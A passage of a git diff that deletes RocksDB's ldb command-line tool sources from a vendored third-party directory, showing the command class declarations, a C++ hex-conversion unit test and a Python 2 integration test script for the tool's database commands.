-  static const std::string ARG_NEW_COMPACTION_STYLE;
-};
-
-class WALDumperCommand : public LDBCommand {
- public:
-  static std::string Name() { return "dump_wal"; }
-
-  WALDumperCommand(const std::vector<std::string>& params,
-                   const std::map<std::string, std::string>& options,
-                   const std::vector<std::string>& flags);
-
-  virtual bool NoDBOpen() override { return true; }
-
-  static void Help(std::string& ret);
-  virtual void DoCommand() override;
-
- private:
-  bool print_header_;
-  std::string wal_file_;
-  bool print_values_;
-
-  static const std::string ARG_WAL_FILE;
-  static const std::string ARG_PRINT_HEADER;
-  static const std::string ARG_PRINT_VALUE;
-};
-
-class GetCommand : public LDBCommand {
- public:
-  static std::string Name() { return "get"; }
-
-  GetCommand(const std::vector<std::string>& params,
-             const std::map<std::string, std::string>& options,
-             const std::vector<std::string>& flags);
-
-  virtual void DoCommand() override;
-
-  static void Help(std::string& ret);
-
- private:
-  std::string key_;
-};
-
-class ApproxSizeCommand : public LDBCommand {
- public:
-  static std::string Name() { return "approxsize"; }
-
-  ApproxSizeCommand(const std::vector<std::string>& params,
-                    const std::map<std::string, std::string>& options,
-                    const std::vector<std::string>& flags);
-
-  virtual void DoCommand() override;
-
-  static void Help(std::string& ret);
-
- private:
-  std::string start_key_;
-  std::string end_key_;
-};
-
-class BatchPutCommand : public LDBCommand {
- public:
-  static std::string Name() { return "batchput"; }
-
-  BatchPutCommand(const std::vector<std::string>& params,
-                  const std::map<std::string, std::string>& options,
-                  const std::vector<std::string>& flags);
-
-  virtual void DoCommand() override;
-
-  static void Help(std::string& ret);
-
-  virtual Options PrepareOptionsForOpenDB() override;
-
- private:
-  /**
-   * The key-values to be inserted.
-   */
-  std::vector<std::pair<std::string, std::string>> key_values_;
-};
-
-class ScanCommand : public LDBCommand {
- public:
-  static std::string Name() { return "scan"; }
-
-  ScanCommand(const std::vector<std::string>& params,
-              const std::map<std::string, std::string>& options,
-              const std::vector<std::string>& flags);
-
-  virtual void DoCommand() override;
-
-  static void Help(std::string& ret);
-
- private:
-  std::string start_key_;
-  std::string end_key_;
-  bool start_key_specified_;
-  bool end_key_specified_;
-  int max_keys_scanned_;
-  bool no_value_;
-};
-
-class DeleteCommand : public LDBCommand {
- public:
-  static std::string Name() { return "delete"; }
-
-  DeleteCommand(const std::vector<std::string>& params,
-                const std::map<std::string, std::string>& options,
-                const std::vector<std::string>& flags);
-
-  virtual void DoCommand() override;
-
-  static void Help(std::string& ret);
-
- private:
-  std::string key_;
-};
-
-class DeleteRangeCommand : public LDBCommand {
- public:
-  static std::string Name() { return "deleterange"; }
-
-  DeleteRangeCommand(const std::vector<std::string>& params,
-                     const std::map<std::string, std::string>& options,
-                     const std::vector<std::string>& flags);
-
-  virtual void DoCommand() override;
-
-  static void Help(std::string& ret);
-
- private:
-  std::string begin_key_;
-  std::string end_key_;
-};
-
-class PutCommand : public LDBCommand {
- public:
-  static std::string Name() { return "put"; }
-
-  PutCommand(const std::vector<std::string>& params,
-             const std::map<std::string, std::string>& options,
-             const std::vector<std::string>& flags);
-
-  virtual void DoCommand() override;
-
-  static void Help(std::string& ret);
-
-  virtual Options PrepareOptionsForOpenDB() override;
-
- private:
-  std::string key_;
-  std::string value_;
-};
-
-/**
- * Command that starts up a REPL shell that allows
- * get/put/delete.
- */
-class DBQuerierCommand : public LDBCommand {
- public:
-  static std::string Name() { return "query"; }
-
-  DBQuerierCommand(const std::vector<std::string>& params,
-                   const std::map<std::string, std::string>& options,
-                   const std::vector<std::string>& flags);
-
-  static void Help(std::string& ret);
-
-  virtual void DoCommand() override;
-
- private:
-  static const char* HELP_CMD;
-  static const char* GET_CMD;
-  static const char* PUT_CMD;
-  static const char* DELETE_CMD;
-};
-
-class CheckConsistencyCommand : public LDBCommand {
- public:
-  static std::string Name() { return "checkconsistency"; }
-
-  CheckConsistencyCommand(const std::vector<std::string>& params,
-                          const std::map<std::string, std::string>& options,
-                          const std::vector<std::string>& flags);
-
-  virtual void DoCommand() override;
-
-  virtual bool NoDBOpen() override { return true; }
-
-  static void Help(std::string& ret);
-};
-
-class CheckPointCommand : public LDBCommand {
- public:
-  static std::string Name() { return "checkpoint"; }
-
-  CheckPointCommand(const std::vector<std::string>& params,
-                const std::map<std::string, std::string>& options,
-                const std::vector<std::string>& flags);
-
-  virtual void DoCommand() override;
-
-  static void Help(std::string& ret);
-
-  std::string checkpoint_dir_;
- private:
-  static const std::string ARG_CHECKPOINT_DIR;
-};
-
-class RepairCommand : public LDBCommand {
- public:
-  static std::string Name() { return "repair"; }
-
-  RepairCommand(const std::vector<std::string>& params,
-                const std::map<std::string, std::string>& options,
-                const std::vector<std::string>& flags);
-
-  virtual void DoCommand() override;
-
-  virtual bool NoDBOpen() override { return true; }
-
-  static void Help(std::string& ret);
-};
-
-class BackupableCommand : public LDBCommand {
- public:
-  BackupableCommand(const std::vector<std::string>& params,
-                    const std::map<std::string, std::string>& options,
-                    const std::vector<std::string>& flags);
-
- protected:
-  static void Help(const std::string& name, std::string& ret);
-  std::string backup_env_uri_;
-  std::string backup_dir_;
-  int num_threads_;
-  std::unique_ptr<Logger> logger_;
-
- private:
-  static const std::string ARG_BACKUP_DIR;
-  static const std::string ARG_BACKUP_ENV_URI;
-  static const std::string ARG_NUM_THREADS;
-  static const std::string ARG_STDERR_LOG_LEVEL;
-};
-
-class BackupCommand : public BackupableCommand {
- public:
-  static std::string Name() { return "backup"; }
-  BackupCommand(const std::vector<std::string>& params,
-                const std::map<std::string, std::string>& options,
-                const std::vector<std::string>& flags);
-  virtual void DoCommand() override;
-  static void Help(std::string& ret);
-};
-
-class RestoreCommand : public BackupableCommand {
- public:
-  static std::string Name() { return "restore"; }
-  RestoreCommand(const std::vector<std::string>& params,
-                 const std::map<std::string, std::string>& options,
-                 const std::vector<std::string>& flags);
-  virtual void DoCommand() override;
-  virtual bool NoDBOpen() override { return true; }
-  static void Help(std::string& ret);
-};
-
-}  // namespace rocksdb
diff --git a/thirdparty/rocksdb/tools/ldb_cmd_test.cc b/thirdparty/rocksdb/tools/ldb_cmd_test.cc
deleted file mode 100644
index 16f9631..0000000
--- a/thirdparty/rocksdb/tools/ldb_cmd_test.cc
+++ /dev/null
@@ -1,62 +0,0 @@
-//  Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-//
-#ifndef ROCKSDB_LITE
-
-#include "rocksdb/utilities/ldb_cmd.h"
-#include "util/testharness.h"
-
-using std::string;
-using std::vector;
-using std::map;
-
-class LdbCmdTest : public testing::Test {};
-
-TEST_F(LdbCmdTest, HexToString) {
-  // map input to expected outputs.
-  // odd number of "hex" half bytes doesn't make sense
-  map<string, vector<int>> inputMap = {
-      {"0x07", {7}},        {"0x5050", {80, 80}},          {"0xFF", {-1}},
-      {"0x1234", {18, 52}}, {"0xaaAbAC", {-86, -85, -84}}, {"0x1203", {18, 3}},
-  };
-
-  for (const auto& inPair : inputMap) {
-    auto actual = rocksdb::LDBCommand::HexToString(inPair.first);
-    auto expected = inPair.second;
-    for (unsigned int i = 0; i < actual.length(); i++) {
-      EXPECT_EQ(expected[i], static_cast<int>((signed char) actual[i]));
-    }
-    auto reverse = rocksdb::LDBCommand::StringToHex(actual);
-    EXPECT_STRCASEEQ(inPair.first.c_str(), reverse.c_str());
-  }
-}
-
-TEST_F(LdbCmdTest, HexToStringBadInputs) {
-  const vector<string> badInputs = {
-      "0xZZ", "123", "0xx5", "0x111G", "0x123", "Ox12", "0xT", "0x1Q1",
-  };
-  for (const auto badInput : badInputs) {
-    try {
-      rocksdb::LDBCommand::HexToString(badInput);
-      std::cerr << "Should fail on bad hex value: " << badInput << "\n";
-      FAIL();
-    } catch (...) {
-    }
-  }
-}
-
-int main(int argc, char** argv) {
-  ::testing::InitGoogleTest(&argc, argv);
-  return RUN_ALL_TESTS();
-}
-#else
-#include <stdio.h>
-
-int main(int argc, char** argv) {
-  fprintf(stderr, "SKIPPED as LDBCommand is not supported in ROCKSDB_LITE\n");
-  return 0;
-}
-
-#endif  // ROCKSDB_LITE
diff --git a/thirdparty/rocksdb/tools/ldb_test.py b/thirdparty/rocksdb/tools/ldb_test.py
deleted file mode 100644
index 5d52d79..0000000
--- a/thirdparty/rocksdb/tools/ldb_test.py
+++ /dev/null
@@ -1,551 +0,0 @@
-import os
-import glob
-import os.path
-import shutil
-import subprocess
-import time
-import unittest
-import tempfile
-import re
-
-def my_check_output(*popenargs, **kwargs):
-    """
-    If we had python 2.7, we should simply use subprocess.check_output.
-    This is a stop-gap solution for python 2.6
-    """
-    if 'stdout' in kwargs:
-        raise ValueError('stdout argument not allowed, it will be overridden.')
-    process = subprocess.Popen(stderr=subprocess.PIPE, stdout=subprocess.PIPE,
-                               *popenargs, **kwargs)
-    output, unused_err = process.communicate()
-    retcode = process.poll()
-    if retcode:
-        cmd = kwargs.get("args")
-        if cmd is None:
-            cmd = popenargs[0]
-        raise Exception("Exit code is not 0.  It is %d.  Command: %s" %
-                (retcode, cmd))
-    return output
-
-def run_err_null(cmd):
-    return os.system(cmd + " 2>/dev/null ")
-
-class LDBTestCase(unittest.TestCase):
-    def setUp(self):
-        self.TMP_DIR  = tempfile.mkdtemp(prefix="ldb_test_")
-        self.DB_NAME = "testdb"
-
-    def tearDown(self):
-        assert(self.TMP_DIR.strip() != "/"
-                and self.TMP_DIR.strip() != "/tmp"
-                and self.TMP_DIR.strip() != "/tmp/") #Just some paranoia
-
-        shutil.rmtree(self.TMP_DIR)
-
-    def dbParam(self, dbName):
-        return "--db=%s" % os.path.join(self.TMP_DIR, dbName)
-
-    def assertRunOKFull(self, params, expectedOutput, unexpected=False,
-                        isPattern=False):
-        """
-        All command-line params must be specified.
-        Allows full flexibility in testing; for example: missing db param.
-
-        """
-        output = my_check_output("./ldb %s |grep -v \"Created bg thread\"" %
-                            params, shell=True)
-        if not unexpected:
-            if isPattern:
-                self.assertNotEqual(expectedOutput.search(output.strip()),
-                                    None)
-            else:
-                self.assertEqual(output.strip(), expectedOutput.strip())
-        else:
-            if isPattern:
-                self.assertEqual(expectedOutput.search(output.strip()), None)
-            else:
-                self.assertNotEqual(output.strip(), expectedOutput.strip())
-
-    def assertRunFAILFull(self, params):
-        """
-        All command-line params must be specified.
-        Allows full flexibility in testing; for example: missing db param.
-
-        """
-        try:
-
-            my_check_output("./ldb %s >/dev/null 2>&1 |grep -v \"Created bg \
-                thread\"" % params, shell=True)
-        except Exception, e:
-            return
-        self.fail(
-            "Exception should have been raised for command with params: %s" %
-            params)
-
-    def assertRunOK(self, params, expectedOutput, unexpected=False):
-        """
-        Uses the default test db.
-
-        """
-        self.assertRunOKFull("%s %s" % (self.dbParam(self.DB_NAME), params),
-                             expectedOutput, unexpected)
-
-    def assertRunFAIL(self, params):
-        """
-        Uses the default test db.
-        """
-        self.assertRunFAILFull("%s %s" % (self.dbParam(self.DB_NAME), params))
-
-    def testSimpleStringPutGet(self):
-        print "Running testSimpleStringPutGet..."
-        self.assertRunFAIL("put x1 y1")
-        self.assertRunOK("put --create_if_missing x1 y1", "OK")
-        self.assertRunOK("get x1", "y1")
-        self.assertRunFAIL("get x2")
-
-        self.assertRunOK("put x2 y2", "OK")
-        self.assertRunOK("get x1", "y1")
-        self.assertRunOK("get x2", "y2")
-        self.assertRunFAIL("get x3")
-
-        self.assertRunOK("scan --from=x1 --to=z", "x1 : y1\nx2 : y2")
-        self.assertRunOK("put x3 y3", "OK")
-
-        self.assertRunOK("scan --from=x1 --to=z", "x1 : y1\nx2 : y2\nx3 : y3")
-        self.assertRunOK("scan", "x1 : y1\nx2 : y2\nx3 : y3")
-        self.assertRunOK("scan --from=x", "x1 : y1\nx2 : y2\nx3 : y3")
-
-        self.assertRunOK("scan --to=x2", "x1 : y1")
-        self.assertRunOK("scan --from=x1 --to=z --max_keys=1", "x1 : y1")
-        self.assertRunOK("scan --from=x1 --to=z --max_keys=2",
-                "x1 : y1\nx2 : y2")
-
-        self.assertRunOK("scan --from=x1 --to=z --max_keys=3",
-                "x1 : y1\nx2 : y2\nx3 : y3")
-        self.assertRunOK("scan --from=x1 --to=z --max_keys=4",
-                "x1 : y1\nx2 : y2\nx3 : y3")
-        self.assertRunOK("scan --from=x1 --to=x2", "x1 : y1")
-        self.assertRunOK("scan --from=x2 --to=x4", "x2 : y2\nx3 : y3")
-        self.assertRunFAIL("scan --from=x4 --to=z") # No results => FAIL
-        self.assertRunFAIL("scan --from=x1 --to=z --max_keys=foo")
-
-        self.assertRunOK("scan", "x1 : y1\nx2 : y2\nx3 : y3")
-
-        self.assertRunOK("delete x1", "OK")
-        self.assertRunOK("scan", "x2 : y2\nx3 : y3")
-
-        self.assertRunOK("delete NonExistentKey", "OK")
-        # It is weird that GET and SCAN raise exception for
-        # non-existent key, while delete does not
-
-        self.assertRunOK("checkconsistency", "OK")
-
-    def dumpDb(self, params, dumpFile):
-        return 0 == run_err_null("./ldb dump %s > %s" % (params, dumpFile))
-
-    def loadDb(self, params, dumpFile):
-        return 0 == run_err_null("cat %s | ./ldb load %s" % (dumpFile, params))
-
-    def testStringBatchPut(self):
-        print "Running testStringBatchPut..."
-        self.assertRunOK("batchput x1 y1 --create_if_missing", "OK")
-        self.assertRunOK("scan", "x1 : y1")
-        self.assertRunOK("batchput x2 y2 x3 y3 \"x4 abc\" \"y4 xyz\"", "OK")
-        self.assertRunOK("scan", "x1 : y1\nx2 : y2\nx3 : y3\nx4 abc : y4 xyz")
-        self.assertRunFAIL("batchput")
-        self.assertRunFAIL("batchput k1")
-        self.assertRunFAIL("batchput k1 v1 k2")
-
-    def testCountDelimDump(self):
-        print "Running testCountDelimDump..."
-        self.assertRunOK("batchput x.1 x1 --create_if_missing", "OK")
-        self.assertRunOK("batchput y.abc abc y.2 2 z.13c pqr", "OK")
-        self.assertRunOK("dump --count_delim", "x => count:1\tsize:5\ny => count:2\tsize:12\nz => count:1\tsize:8")
-        self.assertRunOK("dump --count_delim=\".\"", "x => count:1\tsize:5\ny => count:2\tsize:12\nz => count:1\tsize:8")
-        self.assertRunOK("batchput x,2 x2 x,abc xabc", "OK")
-        self.assertRunOK("dump --count_delim=\",\"", "x => count:2\tsize:14\nx.1 => count:1\tsize:5\ny.2 => count:1\tsize:4\ny.abc => count:1\tsize:8\nz.13c => count:1\tsize:8")
-
-    def testCountDelimIDump(self):
-        print "Running testCountDelimIDump..."
-        self.assertRunOK("batchput x.1 x1 --create_if_missing", "OK")
-        self.assertRunOK("batchput y.abc abc y.2 2 z.13c pqr", "OK")
-        self.assertRunOK("idump --count_delim", "x => count:1\tsize:5\ny => count:2\tsize:12\nz => count:1\tsize:8")
-        self.assertRunOK("idump --count_delim=\".\"", "x => count:1\tsize:5\ny => count:2\tsize:12\nz => count:1\tsize:8")
-        self.assertRunOK("batchput x,2 x2 x,abc xabc", "OK")
-        self.assertRunOK("idump --count_delim=\",\"", "x => count:2\tsize:14\nx.1 => count:1\tsize:5\ny.2 => count:1\tsize:4\ny.abc => count:1\tsize:8\nz.13c => count:1\tsize:8")
-
-    def testInvalidCmdLines(self):
-        print "Running testInvalidCmdLines..."
-        # db not specified
-        self.assertRunFAILFull("put 0x6133 0x6233 --hex --create_if_missing")
-        # No param called he
-        self.assertRunFAIL("put 0x6133 0x6233 --he --create_if_missing")
-        # max_keys is not applicable for put
-        self.assertRunFAIL("put 0x6133 0x6233 --max_keys=1 --create_if_missing")
-        # hex has invalid boolean value
-
-    def testHexPutGet(self):
-        print "Running testHexPutGet..."
-        self.assertRunOK("put a1 b1 --create_if_missing", "OK")
-        self.assertRunOK("scan", "a1 : b1")
-        self.assertRunOK("scan --hex", "0x6131 : 0x6231")
-        self.assertRunFAIL("put --hex 6132 6232")
-        self.assertRunOK("put --hex 0x6132 0x6232", "OK")
-        self.assertRunOK("scan --hex", "0x6131 : 0x6231\n0x6132 : 0x6232")
-        self.assertRunOK("scan", "a1 : b1\na2 : b2")
-        self.assertRunOK("get a1", "b1")
-        self.assertRunOK("get --hex 0x6131", "0x6231")
-        self.assertRunOK("get a2", "b2")
-        self.assertRunOK("get --hex 0x6132", "0x6232")
-        self.assertRunOK("get --key_hex 0x6132", "b2")
-        self.assertRunOK("get --key_hex --value_hex 0x6132", "0x6232")
-        self.assertRunOK("get --value_hex a2", "0x6232")
-        self.assertRunOK("scan --key_hex --value_hex",
-                "0x6131 : 0x6231\n0x6132 : 0x6232")
-        self.assertRunOK("scan --hex --from=0x6131 --to=0x6133",
-                "0x6131 : 0x6231\n0x6132 : 0x6232")
-        self.assertRunOK("scan --hex --from=0x6131 --to=0x6132",
-                "0x6131 : 0x6231")
-        self.assertRunOK("scan --key_hex", "0x6131 : b1\n0x6132 : b2")
-        self.assertRunOK("scan --value_hex", "a1 : 0x6231\na2 : 0x6232")
-        self.assertRunOK("batchput --hex 0x6133 0x6233 0x6134 0x6234", "OK")
-        self.assertRunOK("scan", "a1 : b1\na2 : b2\na3 : b3\na4 : b4")
-        self.assertRunOK("delete --hex 0x6133", "OK")
-        self.assertRunOK("scan", "a1 : b1\na2 : b2\na4 : b4")
-        self.assertRunOK("checkconsistency", "OK")
-
-    def testTtlPutGet(self):
-        print "Running testTtlPutGet..."
-        self.assertRunOK("put a1 b1 --ttl --create_if_missing", "OK")
-        self.assertRunOK("scan --hex", "0x6131 : 0x6231", True)
-        self.assertRunOK("dump --ttl ", "a1 ==> b1", True)
-        self.assertRunOK("dump --hex --ttl ",
-                         "0x6131 ==> 0x6231\nKeys in range: 1")
-        self.assertRunOK("scan --hex --ttl", "0x6131 : 0x6231")
-        self.assertRunOK("get --value_hex a1", "0x6231", True)
-        self.assertRunOK("get --ttl a1", "b1")
-        self.assertRunOK("put a3 b3 --create_if_missing", "OK")
-        # fails because timstamp's length is greater than value's
-        self.assertRunFAIL("get --ttl a3")
-        self.assertRunOK("checkconsistency", "OK")
-
-    def testInvalidCmdLines(self):
-        print "Running testInvalidCmdLines..."
-        # db not specified
-        self.assertRunFAILFull("put 0x6133 0x6233 --hex --create_if_missing")
-        # No param called he
-        self.assertRunFAIL("put 0x6133 0x6233 --he --create_if_missing")
-        # max_keys is not applicable for put
-        self.assertRunFAIL("put 0x6133 0x6233 --max_keys=1 --create_if_missing")
-        # hex has invalid boolean value
-        self.assertRunFAIL("put 0x6133 0x6233 --hex=Boo --create_if_missing")
-
-    def testDumpLoad(self):
-        print "Running testDumpLoad..."
-        self.assertRunOK("batchput --create_if_missing x1 y1 x2 y2 x3 y3 x4 y4",
-                "OK")
-        self.assertRunOK("scan", "x1 : y1\nx2 : y2\nx3 : y3\nx4 : y4")
-        origDbPath = os.path.join(self.TMP_DIR, self.DB_NAME)
-
-        # Dump and load without any additional params specified
-        dumpFilePath = os.path.join(self.TMP_DIR, "dump1")
-        loadedDbPath = os.path.join(self.TMP_DIR, "loaded_from_dump1")
-        self.assertTrue(self.dumpDb("--db=%s" % origDbPath, dumpFilePath))
-        self.assertTrue(self.loadDb(
-            "--db=%s --create_if_missing" % loadedDbPath, dumpFilePath))
-        self.assertRunOKFull("scan --db=%s" % loadedDbPath,
-                "x1 : y1\nx2 : y2\nx3 : y3\nx4 : y4")
-
-        # Dump and load in hex
-        dumpFilePath = os.path.join(self.TMP_DIR, "dump2")
-        loadedDbPath = os.path.join(self.TMP_DIR, "loaded_from_dump2")
-        self.assertTrue(self.dumpDb("--db=%s --hex" % origDbPath, dumpFilePath))
-        self.assertTrue(self.loadDb(
-            "--db=%s --hex --create_if_missing" % loadedDbPath, dumpFilePath))
-        self.assertRunOKFull("scan --db=%s" % loadedDbPath,
-                "x1 : y1\nx2 : y2\nx3 : y3\nx4 : y4")
-
-        # Dump only a portion of the key range
-        dumpFilePath = os.path.join(self.TMP_DIR, "dump3")
-        loadedDbPath = os.path.join(self.TMP_DIR, "loaded_from_dump3")
-        self.assertTrue(self.dumpDb(
-            "--db=%s --from=x1 --to=x3" % origDbPath, dumpFilePath))
-        self.assertTrue(self.loadDb(
-            "--db=%s --create_if_missing" % loadedDbPath, dumpFilePath))
-        self.assertRunOKFull("scan --db=%s" % loadedDbPath, "x1 : y1\nx2 : y2")
-
-        # Dump upto max_keys rows
-        dumpFilePath = os.path.join(self.TMP_DIR, "dump4")
-        loadedDbPath = os.path.join(self.TMP_DIR, "loaded_from_dump4")
-        self.assertTrue(self.dumpDb(
-            "--db=%s --max_keys=3" % origDbPath, dumpFilePath))
-        self.assertTrue(self.loadDb(
-            "--db=%s --create_if_missing" % loadedDbPath, dumpFilePath))
-        self.assertRunOKFull("scan --db=%s" % loadedDbPath,
-                "x1 : y1\nx2 : y2\nx3 : y3")
-
-        # Load into an existing db, create_if_missing is not specified
-        self.assertTrue(self.dumpDb("--db=%s" % origDbPath, dumpFilePath))
-        self.assertTrue(self.loadDb("--db=%s" % loadedDbPath, dumpFilePath))
-        self.assertRunOKFull("scan --db=%s" % loadedDbPath,
-                "x1 : y1\nx2 : y2\nx3 : y3\nx4 : y4")
-
-        # Dump and load with WAL disabled
-        dumpFilePath = os.path.join(self.TMP_DIR, "dump5")
-        loadedDbPath = os.path.join(self.TMP_DIR, "loaded_from_dump5")
-        self.assertTrue(self.dumpDb("--db=%s" % origDbPath, dumpFilePath))
-        self.assertTrue(self.loadDb(
-            "--db=%s --disable_wal --create_if_missing" % loadedDbPath,
-            dumpFilePath))
-        self.assertRunOKFull("scan --db=%s" % loadedDbPath,
-                "x1 : y1\nx2 : y2\nx3 : y3\nx4 : y4")
-
-        # Dump and load with lots of extra params specified
-        extraParams = " ".join(["--bloom_bits=14", "--block_size=1024",
-                                "--auto_compaction=true",
-                                "--write_buffer_size=4194304",
-                                "--file_size=2097152"])
-        dumpFilePath = os.path.join(self.TMP_DIR, "dump6")
-        loadedDbPath = os.path.join(self.TMP_DIR, "loaded_from_dump6")
-        self.assertTrue(self.dumpDb(
-            "--db=%s %s" % (origDbPath, extraParams), dumpFilePath))
-        self.assertTrue(self.loadDb(
-            "--db=%s %s --create_if_missing" % (loadedDbPath, extraParams),
-            dumpFilePath))
-        self.assertRunOKFull("scan --db=%s" % loadedDbPath,
-                "x1 : y1\nx2 : y2\nx3 : y3\nx4 : y4")
-
-        # Dump with count_only
-        dumpFilePath = os.path.join(self.TMP_DIR, "dump7")
-        loadedDbPath = os.path.join(self.TMP_DIR, "loaded_from_dump7")
-        self.assertTrue(self.dumpDb(
-            "--db=%s --count_only" % origDbPath, dumpFilePath))
-        self.assertTrue(self.loadDb(
-            "--db=%s --create_if_missing" % loadedDbPath, dumpFilePath))
-        # DB should have atleast one value for scan to work
-        self.assertRunOKFull("put --db=%s k1 v1" % loadedDbPath, "OK")
-        self.assertRunOKFull("scan --db=%s" % loadedDbPath, "k1 : v1")
-
-        # Dump command fails because of typo in params
-        dumpFilePath = os.path.join(self.TMP_DIR, "dump8")
-        self.assertFalse(self.dumpDb(
-            "--db=%s --create_if_missing" % origDbPath, dumpFilePath))
-
-    def testIDumpBasics(self):
-        print "Running testIDumpBasics..."
-        self.assertRunOK("put a val --create_if_missing", "OK")
-        self.assertRunOK("put b val", "OK")
-        self.assertRunOK(
-                "idump", "'a' seq:1, type:1 => val\n"
-                "'b' seq:2, type:1 => val\nInternal keys in range: 2")
-        self.assertRunOK(
-                "idump --input_key_hex --from=%s --to=%s" % (hex(ord('a')),
-                                                             hex(ord('b'))),
-                "'a' seq:1, type:1 => val\nInternal keys in range: 1")
-
-    def testMiscAdminTask(self):
-        print "Running testMiscAdminTask..."
-        # These tests need to be improved; for example with asserts about
-        # whether compaction or level reduction actually took place.
-        self.assertRunOK("batchput --create_if_missing x1 y1 x2 y2 x3 y3 x4 y4",
-                "OK")
-        self.assertRunOK("scan", "x1 : y1\nx2 : y2\nx3 : y3\nx4 : y4")
-        origDbPath = os.path.join(self.TMP_DIR, self.DB_NAME)
-
-        self.assertTrue(0 == run_err_null(
-            "./ldb compact --db=%s" % origDbPath))
-        self.assertRunOK("scan", "x1 : y1\nx2 : y2\nx3 : y3\nx4 : y4")
-
-        self.assertTrue(0 == run_err_null(
-            "./ldb reduce_levels --db=%s --new_levels=2" % origDbPath))
-        self.assertRunOK("scan", "x1 : y1\nx2 : y2\nx3 : y3\nx4 : y4")
-
-        self.assertTrue(0 == run_err_null(
-            "./ldb reduce_levels --db=%s --new_levels=3" % origDbPath))
-        self.assertRunOK("scan", "x1 : y1\nx2 : y2\nx3 : y3\nx4 : y4")
-
-        self.assertTrue(0 == run_err_null(
-            "./ldb compact --db=%s --from=x1 --to=x3" % origDbPath))
-        self.assertRunOK("scan", "x1 : y1\nx2 : y2\nx3 : y3\nx4 : y4")
-
-        self.assertTrue(0 == run_err_null(
-            "./ldb compact --db=%s --hex --from=0x6131 --to=0x6134"
-            % origDbPath))
-        self.assertRunOK("scan", "x1 : y1\nx2 : y2\nx3 : y3\nx4 : y4")
-
-        #TODO(dilip): Not sure what should be passed to WAL.Currently corrupted.
-        self.assertTrue(0 == run_err_null(
-            "./ldb dump_wal --db=%s --walfile=%s --header" % (
-                origDbPath, os.path.join(origDbPath, "LOG"))))
-        self.assertRunOK("scan", "x1 : y1\nx2 : y2\nx3 : y3\nx4 : y4")
-
-    def testCheckConsistency(self):
-        print "Running testCheckConsistency..."
-
-        dbPath = os.path.join(self.TMP_DIR, self.DB_NAME)
-        self.assertRunOK("put x1 y1 --create_if_missing", "OK")
-        self.assertRunOK("put x2 y2", "OK")
-        self.assertRunOK("get x1", "y1")
-        self.assertRunOK("checkconsistency", "OK")
-
-        sstFilePath = my_check_output("ls %s" % os.path.join(dbPath, "*.sst"),
-                                      shell=True)
-
-        # Modify the file
-        my_check_output("echo 'evil' > %s" % sstFilePath, shell=True)
-        self.assertRunFAIL("checkconsistency")
-
-        # Delete the file
-        my_check_output("rm -f %s" % sstFilePath, shell=True)
-        self.assertRunFAIL("checkconsistency")
-
-    def dumpLiveFiles(self, params, dumpFile):
-        return 0 == run_err_null("./ldb dump_live_files %s > %s" % (
-            params, dumpFile))
-
-    def testDumpLiveFiles(self):
-        print "Running testDumpLiveFiles..."
-
-        dbPath = os.path.join(self.TMP_DIR, self.DB_NAME)
-        self.assertRunOK("put x1 y1 --create_if_missing", "OK")
-        self.assertRunOK("put x2 y2", "OK")
-        dumpFilePath = os.path.join(self.TMP_DIR, "dump1")
-        self.assertTrue(self.dumpLiveFiles("--db=%s" % dbPath, dumpFilePath))
-        self.assertRunOK("delete x1", "OK")
-        self.assertRunOK("put x3 y3", "OK")
-        dumpFilePath = os.path.join(self.TMP_DIR, "dump2")
-        self.assertTrue(self.dumpLiveFiles("--db=%s" % dbPath, dumpFilePath))
-
-    def getManifests(self, directory):
-        return glob.glob(directory + "/MANIFEST-*")
-
-    def getSSTFiles(self, directory):
-        return glob.glob(directory + "/*.sst")
-
-    def getWALFiles(self, directory):
-        return glob.glob(directory + "/*.log")
-
-    def copyManifests(self, src, dest):
-        return 0 == run_err_null("cp " + src + " " + dest)
-
-    def testManifestDump(self):
-        print "Running testManifestDump..."
-        dbPath = os.path.join(self.TMP_DIR, self.DB_NAME)
-        self.assertRunOK("put 1 1 --create_if_missing", "OK")
-        self.assertRunOK("put 2 2", "OK")
-        self.assertRunOK("put 3 3", "OK")
-        # Pattern to expect from manifest_dump.
-        num = "[0-9]+"
-        st = ".*"
-        subpat = st + " seq:" + num + ", type:" + num
-        regex = num + ":" + num + "\[" + subpat + ".." + subpat + "\]"
-        expected_pattern = re.compile(regex)
-        cmd = "manifest_dump --db=%s"
-        manifest_files = self.getManifests(dbPath)
-        self.assertTrue(len(manifest_files) == 1)
-        # Test with the default manifest file in dbPath.
-        self.assertRunOKFull(cmd % dbPath, expected_pattern,
-                             unexpected=False, isPattern=True)
-        self.copyManifests(manifest_files[0], manifest_files[0] + "1")
-        manifest_files = self.getManifests(dbPath)
-        self.assertTrue(len(manifest_files) == 2)
-        # Test with multiple manifest files in dbPath.
-        self.assertRunFAILFull(cmd % dbPath)
-        # Running it with the copy we just created should pass.
-        self.assertRunOKFull((cmd + " --path=%s")
-                             % (dbPath, manifest_files[1]),
-                             expected_pattern, unexpected=False,
-                             isPattern=True)
-        # Make sure that using the dump with --path will result in identical
-        # output as just using manifest_dump.
-        cmd = "dump --path=%s"
-        self.assertRunOKFull((cmd)
-                             % (manifest_files[1]),
-                             expected_pattern, unexpected=False,
-                             isPattern=True)
-
-    def testSSTDump(self):
-        print "Running testSSTDump..."
-
-        dbPath = os.path.join(self.TMP_DIR, self.DB_NAME)
-        self.assertRunOK("put sst1 sst1_val --create_if_missing", "OK")
-        self.assertRunOK("put sst2 sst2_val", "OK")
-        self.assertRunOK("get sst1", "sst1_val")
-
-        # Pattern to expect from SST dump.
-        regex = ".*Sst file format:.*"
-        expected_pattern = re.compile(regex)
-
-        sst_files = self.getSSTFiles(dbPath)
-        self.assertTrue(len(sst_files) >= 1)
-        cmd = "dump --path=%s"
-        self.assertRunOKFull((cmd)
-                             % (sst_files[0]),
-                             expected_pattern, unexpected=False,
-                             isPattern=True)
-
-    def testWALDump(self):
-        print "Running testWALDump..."
-
-        dbPath = os.path.join(self.TMP_DIR, self.DB_NAME)
-        self.assertRunOK("put wal1 wal1_val --create_if_missing", "OK")
-        self.assertRunOK("put wal2 wal2_val", "OK")
-        self.assertRunOK("get wal1", "wal1_val")
-
-        # Pattern to expect from WAL dump.
-        regex = "^Sequence,Count,ByteSize,Physical Offset,Key\(s\).*"
-        expected_pattern = re.compile(regex)
-
-        wal_files = self.getWALFiles(dbPath)
-        self.assertTrue(len(wal_files) >= 1)
-        cmd = "dump --path=%s"
-        self.assertRunOKFull((cmd)
-                             % (wal_files[0]),
-                             expected_pattern, unexpected=False,
